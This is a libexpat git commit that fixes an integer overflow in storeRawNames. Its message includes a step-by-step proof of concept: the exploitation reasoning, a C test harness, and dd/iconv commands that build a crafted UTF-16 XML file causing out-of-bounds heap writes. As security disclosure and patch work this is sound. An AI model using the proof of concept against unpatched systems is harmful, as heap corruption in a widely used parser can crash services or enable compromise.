summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorSamanta Navarro <ferivoz@riseup.net>2022-02-15 11:55:46 +0000
committerSamanta Navarro <ferivoz@riseup.net>2022-02-15 12:17:18 +0000
commiteb0362808b4f9f1e2345a0cf203b8cc196d776d9 (patch)
tree51a97359b4bfb2f87d21800a2956afebef6dd562
parent81b89678e200820271b72cacdd45fb5868855765 (diff)
downloadlibexpat-git-eb0362808b4f9f1e2345a0cf203b8cc196d776d9.tar.gz
Prevent integer overflow in storeRawNames
It is possible to use an integer overflow in storeRawNames for out of boundary heap writes. Default configuration is affected. If compiled with XML_UNICODE then the attack does not work. Compiling with -fsanitize=address confirms the following proof of concept. The problem can be exploited by abusing the m_buffer expansion logic. Even though the initial size of m_buffer is a power of two, eventually it can end up a little bit lower, thus allowing allocations very close to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag names can be parsed which are almost INT_MAX in size. Unfortunately (from an attacker point of view) INT_MAX/2 is also a limitation in string pools. Having a tag name of INT_MAX/2 characters or more is not possible. Expat can convert between different encodings. UTF-16 documents which contain only ASCII representable characters are twice as large as their ASCII encoded counter-parts. The proof of concept works by taking these three considerations into account: 1. Move the m_buffer size slightly below a power of two by having a short root node <a>. This allows the m_buffer to grow very close to INT_MAX. 2. The string pooling forbids tag names longer than or equal to INT_MAX/2, so keep the attack tag name smaller than that. 3. To be able to still overflow INT_MAX even though the name is limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag which only contains ASCII characters. UTF-16 always stores two bytes per character while the tag name is converted to using only one. Our attack node byte count must be a bit higher than 2/3 INT_MAX so the converted tag name is around INT_MAX/3 which in sum can overflow INT_MAX. Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes without running into INT_MAX boundary check. The string pooling is able to store INT_MAX/3 as tag name because the amount is below INT_MAX/2 limitation. And creating the sum of both eventually overflows in storeRawNames. Proof of Concept: 1. Compile expat with -fsanitize=address. 2. Create Proof of Concept binary which iterates through input file 16 MB at once for better performance and easier integer calculations: ``` cat > poc.c << EOF #include <err.h> #include <expat.h> #include <stdlib.h> #include <stdio.h> #define CHUNK (16 * 1024 * 1024) int main(int argc, char *argv[]) { XML_Parser parser; FILE *fp; char *buf; int i; if (argc != 2) errx(1, "usage: poc file.xml"); if ((parser = XML_ParserCreate(NULL)) == NULL) errx(1, "failed to create expat parser"); if ((fp = fopen(argv[1], "r")) == NULL) { XML_ParserFree(parser); err(1, "failed to open file"); } if ((buf = malloc(CHUNK)) == NULL) { fclose(fp); XML_ParserFree(parser); err(1, "failed to allocate buffer"); } i = 0; while (fread(buf, CHUNK, 1, fp) == 1) { printf("iteration %d: XML_Parse returns %d\n", ++i, XML_Parse(parser, buf, CHUNK, XML_FALSE)); } free(buf); fclose(fp); XML_ParserFree(parser); return 0; } EOF gcc -fsanitize=address -lexpat -o poc poc.c ``` 3. Construct specially prepared UTF-16 XML file: ``` dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368 iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml ``` 4. Run proof of concept: ``` ./poc poc-utf16.xml ```
-rw-r--r--expat/lib/xmlparse.c7
1 files changed, 6 insertions, 1 deletions
diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
index 4b43e613..f34d6ab5 100644
--- a/expat/lib/xmlparse.c
+++ b/expat/lib/xmlparse.c
@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
while (tag) {
int bufSize;
int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
+ size_t rawNameLen;
char *rawNameBuf = tag->buf + nameLen;
/* Stop if already stored. Since m_tagStack is a stack, we can stop
at the first entry that has already been copied; everything
@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
/* For re-use purposes we need to ensure that the
size of tag->buf is a multiple of sizeof(XML_Char).
*/
- bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
+ rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
+ /* Detect and prevent integer overflow. */
+ if (rawNameLen > (size_t)INT_MAX - nameLen)
+ return XML_FALSE;
+ bufSize = nameLen + (int)rawNameLen;
if (bufSize > tag->bufEnd - tag->buf) {
char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
if (temp == NULL)